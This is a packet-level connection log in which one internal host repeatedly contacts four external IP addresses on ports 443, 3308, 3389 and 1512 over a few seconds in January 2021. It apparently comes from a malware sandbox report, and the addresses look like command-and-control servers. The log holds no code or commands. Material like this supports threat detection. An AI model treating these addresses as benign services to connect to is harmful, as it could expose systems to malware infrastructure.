Jan 11, 2021 16:54:09.333645105 CET	443	49375	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:09.333863020 CET	49375	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:09.339400053 CET	49375	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:09.391304016 CET	443	49375	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:09.463948011 CET	49376	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:09.506925106 CET	3308	49376	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:09.507045031 CET	49376	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:09.508730888 CET	49376	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:09.551630974 CET	3308	49376	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:09.562314034 CET	3308	49376	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:09.562334061 CET	3308	49376	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:09.562424898 CET	49376	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:09.579324961 CET	49376	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:09.625483990 CET	3308	49376	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:09.625744104 CET	49376	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:09.635999918 CET	49376	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:09.636465073 CET	49376	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:09.679387093 CET	3308	49376	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:09.679831028 CET	49376	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:09.719902992 CET	3308	49376	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:09.722807884 CET	3308	49376	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:09.722922087 CET	3308	49376	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:09.834259987 CET	3308	49376	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:09.834279060 CET	3308	49376	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:09.834511042 CET	49376	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:09.839514971 CET	49376	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:09.882632971 CET	3308	49376	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:09.947628975 CET	49377	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:10.001353979 CET	3389	49377	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:10.001439095 CET	49377	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:10.002343893 CET	49377	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:10.056283951 CET	3389	49377	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:10.086554050 CET	3389	49377	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:10.086576939 CET	3389	49377	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:10.086622000 CET	49377	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:10.086656094 CET	49377	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:10.093765974 CET	49377	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:10.164644957 CET	3389	49377	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:10.164808035 CET	49377	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:10.172106981 CET	49377	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:10.172310114 CET	49377	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:10.226177931 CET	3389	49377	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:10.226349115 CET	49377	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:10.266263962 CET	3389	49377	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:10.280253887 CET	3389	49377	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:10.280271053 CET	3389	49377	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:10.369452000 CET	3389	49377	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:10.369473934 CET	3389	49377	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:10.369653940 CET	49377	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:10.369703054 CET	49377	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:10.374994040 CET	49377	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:10.428555012 CET	3389	49377	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:10.493118048 CET	49378	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:10.545825958 CET	1512	49378	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:10.545908928 CET	49378	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:10.547020912 CET	49378	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:10.599613905 CET	1512	49378	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:10.607666969 CET	1512	49378	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:10.607685089 CET	1512	49378	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:10.607762098 CET	49378	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:10.617204905 CET	49378	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:10.671158075 CET	1512	49378	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:10.671504974 CET	49378	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:10.682374001 CET	49378	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:10.682773113 CET	49378	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:10.735647917 CET	1512	49378	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:10.735889912 CET	49378	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:10.772809982 CET	1512	49378	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:10.788734913 CET	1512	49378	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:10.887098074 CET	1512	49378	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:10.887135029 CET	1512	49378	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:10.887363911 CET	49378	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:10.893532991 CET	49378	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:10.946187973 CET	1512	49378	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:11.008579016 CET	49379	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:11.060743093 CET	443	49379	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:11.060844898 CET	49379	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:11.062298059 CET	49379	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:11.114470959 CET	443	49379	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:11.129117012 CET	443	49379	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:11.129261017 CET	49379	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:11.149650097 CET	49379	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:11.204159021 CET	443	49379	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:11.204365969 CET	49379	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:11.214487076 CET	49379	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:11.214790106 CET	49379	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:11.267052889 CET	443	49379	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:11.267343998 CET	49379	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:11.319658041 CET	443	49379	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:11.437333107 CET	443	49379	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:11.437418938 CET	49379	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:11.437480927 CET	443	49379	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:11.437594891 CET	49379	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:11.439493895 CET	49379	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:11.491502047 CET	443	49379	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:11.553889990 CET	49380	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:11.597198963 CET	3308	49380	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:11.597335100 CET	49380	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:11.598830938 CET	49380	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:11.641863108 CET	3308	49380	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:11.653223038 CET	3308	49380	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:11.653254032 CET	3308	49380	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:11.653379917 CET	49380	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:11.664283991 CET	49380	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:11.709214926 CET	3308	49380	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:11.709494114 CET	49380	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:11.718496084 CET	49380	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:11.718995094 CET	49380	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:11.762061119 CET	3308	49380	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:11.762268066 CET	49380	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:11.802242994 CET	3308	49380	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:11.805407047 CET	3308	49380	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:11.805438042 CET	3308	49380	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:11.917642117 CET	3308	49380	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:11.917690992 CET	3308	49380	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:11.917975903 CET	49380	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:11.923546076 CET	49380	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:11.966706991 CET	3308	49380	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:12.037723064 CET	49381	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:12.091442108 CET	3389	49381	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:12.091595888 CET	49381	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:12.093743086 CET	49381	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:12.147300959 CET	3389	49381	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:12.165487051 CET	3389	49381	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:12.165544033 CET	3389	49381	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:12.165644884 CET	49381	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:12.165672064 CET	49381	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:12.178612947 CET	49381	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:12.242731094 CET	3389	49381	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:12.242990017 CET	49381	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:12.251954079 CET	49381	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:12.252150059 CET	49381	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:12.306128025 CET	3389	49381	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:12.306530952 CET	49381	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:12.345650911 CET	3389	49381	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:12.360614061 CET	3389	49381	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:12.360656977 CET	3389	49381	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:12.450521946 CET	3389	49381	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:12.450567007 CET	3389	49381	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:12.450913906 CET	49381	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:12.456435919 CET	49381	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:12.510416031 CET	3389	49381	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:12.563440084 CET	49382	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:12.616166115 CET	1512	49382	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:12.616332054 CET	49382	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:12.617914915 CET	49382	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:12.670665979 CET	1512	49382	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:12.677771091 CET	1512	49382	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:12.677802086 CET	1512	49382	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:12.677922964 CET	49382	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:12.677967072 CET	49382	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:12.686120987 CET	49382	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:12.741977930 CET	1512	49382	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:12.746419907 CET	49382	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:12.756697893 CET	49382	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:12.757090092 CET	49382	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:12.810056925 CET	1512	49382	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:12.810399055 CET	49382	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:12.848877907 CET	1512	49382	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:12.863226891 CET	1512	49382	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:12.962341070 CET	1512	49382	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:12.962357044 CET	1512	49382	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:12.962681055 CET	49382	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:12.968770027 CET	49382	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:13.021476030 CET	1512	49382	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:13.083385944 CET	49383	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:13.135446072 CET	443	49383	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:13.135600090 CET	49383	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:13.137151003 CET	49383	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:13.189007044 CET	443	49383	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:13.204226017 CET	443	49383	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:13.204366922 CET	49383	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:13.219036102 CET	49383	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:13.273509979 CET	443	49383	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:13.273788929 CET	49383	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:13.284126043 CET	49383	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:13.284229040 CET	49383	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:13.336525917 CET	443	49383	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:13.336869001 CET	49383	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:13.388998032 CET	443	49383	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:13.506989002 CET	443	49383	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:13.507013083 CET	443	49383	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:13.507365942 CET	49383	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:13.513319016 CET	49383	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:13.565407991 CET	443	49383	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:13.629420042 CET	49384	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:13.672624111 CET	3308	49384	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:13.672745943 CET	49384	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:13.674360991 CET	49384	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:13.717372894 CET	3308	49384	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:13.732197046 CET	3308	49384	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:13.732212067 CET	3308	49384	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:13.732280970 CET	49384	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:13.739891052 CET	49384	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:13.785216093 CET	3308	49384	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:13.785301924 CET	49384	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:13.789037943 CET	49384	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:13.789200068 CET	49384	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:13.832329988 CET	3308	49384	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:13.832699060 CET	49384	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:13.873034000 CET	3308	49384	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:13.875710964 CET	3308	49384	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:13.875788927 CET	3308	49384	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:13.993438005 CET	3308	49384	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:13.993454933 CET	3308	49384	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:13.993735075 CET	49384	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:13.999459982 CET	49384	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:14.042418003 CET	3308	49384	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:14.119431973 CET	49385	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:14.173095942 CET	3389	49385	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:14.173239946 CET	49385	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:14.174804926 CET	49385	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:14.229204893 CET	3389	49385	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:14.253442049 CET	3389	49385	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:14.253489017 CET	3389	49385	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:14.253667116 CET	49385	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:14.267723083 CET	49385	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:14.338978052 CET	3389	49385	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:14.339164972 CET	49385	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:14.346488953 CET	49385	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:14.346626043 CET	49385	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:14.400327921 CET	3389	49385	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:14.400620937 CET	49385	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:14.439171076 CET	3389	49385	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:14.454283953 CET	3389	49385	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:14.454308033 CET	3389	49385	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:14.542824030 CET	3389	49385	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:14.542850018 CET	3389	49385	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:14.543128014 CET	49385	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:14.548738956 CET	49385	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:14.602461100 CET	3389	49385	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:14.659248114 CET	49386	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:14.713042974 CET	1512	49386	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:14.713140965 CET	49386	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:14.714911938 CET	49386	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:14.769846916 CET	1512	49386	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:14.775326014 CET	1512	49386	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:14.775342941 CET	1512	49386	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:14.775448084 CET	49386	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:14.775489092 CET	49386	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:14.791368008 CET	49386	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:14.845226049 CET	1512	49386	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:14.845395088 CET	49386	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:14.853257895 CET	49386	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:14.853627920 CET	49386	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:14.906456947 CET	1512	49386	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:14.906564951 CET	49386	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:14.944801092 CET	1512	49386	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:14.959287882 CET	1512	49386	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:14.959328890 CET	1512	49386	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:15.054799080 CET	1512	49386	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:15.054860115 CET	1512	49386	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:15.055052042 CET	49386	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:15.060954094 CET	49386	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:15.113600016 CET	1512	49386	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:15.173912048 CET	49387	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:15.226054907 CET	443	49387	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:15.226181030 CET	49387	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:15.228207111 CET	49387	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:15.280344963 CET	443	49387	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:15.298644066 CET	443	49387	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:15.298793077 CET	49387	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:15.317329884 CET	49387	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:15.371980906 CET	443	49387	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:15.372162104 CET	49387	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:15.381119013 CET	49387	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:15.381427050 CET	49387	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:15.433578968 CET	443	49387	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:15.433804989 CET	49387	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:15.486011028 CET	443	49387	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:15.602977037 CET	443	49387	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:15.603030920 CET	443	49387	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:15.603162050 CET	49387	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:15.608750105 CET	49387	443	192.168.2.22	77.220.64.37
Jan 11, 2021 16:54:15.660868883 CET	443	49387	77.220.64.37	192.168.2.22
Jan 11, 2021 16:54:15.735786915 CET	49388	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:15.779094934 CET	3308	49388	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:15.779436111 CET	49388	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:15.780987978 CET	49388	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:15.824160099 CET	3308	49388	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:15.838118076 CET	3308	49388	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:15.838159084 CET	3308	49388	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:15.838310003 CET	49388	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:15.854059935 CET	49388	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:15.899554014 CET	3308	49388	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:15.899811029 CET	49388	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:15.909934044 CET	49388	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:15.910352945 CET	49388	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:15.953510046 CET	3308	49388	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:15.953655958 CET	49388	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:15.993087053 CET	3308	49388	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:15.996730089 CET	3308	49388	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:15.996757984 CET	3308	49388	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:16.108359098 CET	3308	49388	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:16.108397961 CET	3308	49388	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:16.108474016 CET	49388	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:16.108537912 CET	49388	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:16.110543966 CET	49388	3308	192.168.2.22	80.86.91.27
Jan 11, 2021 16:54:16.153669119 CET	3308	49388	80.86.91.27	192.168.2.22
Jan 11, 2021 16:54:16.219810963 CET	49389	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:16.273710012 CET	3389	49389	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:16.273814917 CET	49389	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:16.274771929 CET	49389	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:16.328708887 CET	3389	49389	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:16.388703108 CET	3389	49389	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:16.388742924 CET	3389	49389	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:16.388808012 CET	49389	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:16.388845921 CET	49389	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:16.400196075 CET	49389	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:16.454057932 CET	3389	49389	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:16.476305962 CET	3389	49389	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:16.476516962 CET	49389	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:16.486521959 CET	49389	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:16.486666918 CET	49389	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:16.542752981 CET	3389	49389	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:16.543081045 CET	49389	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:16.581610918 CET	3389	49389	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:16.597640038 CET	3389	49389	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:16.597681046 CET	3389	49389	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:16.686188936 CET	3389	49389	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:16.686234951 CET	3389	49389	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:16.686460018 CET	49389	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:16.692153931 CET	49389	3389	192.168.2.22	5.100.228.233
Jan 11, 2021 16:54:16.746332884 CET	3389	49389	5.100.228.233	192.168.2.22
Jan 11, 2021 16:54:16.812330961 CET	49390	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:16.865379095 CET	1512	49390	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:16.865492105 CET	49390	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:16.866348028 CET	49390	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:16.919322968 CET	1512	49390	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:16.926436901 CET	1512	49390	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:16.926467896 CET	1512	49390	46.105.131.65	192.168.2.22
Jan 11, 2021 16:54:16.926537991 CET	49390	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:16.926561117 CET	49390	1512	192.168.2.22	46.105.131.65
Jan 11, 2021 16:54:16.936702967 CET	49390	1512	192.168.2.22	46.105.131.65
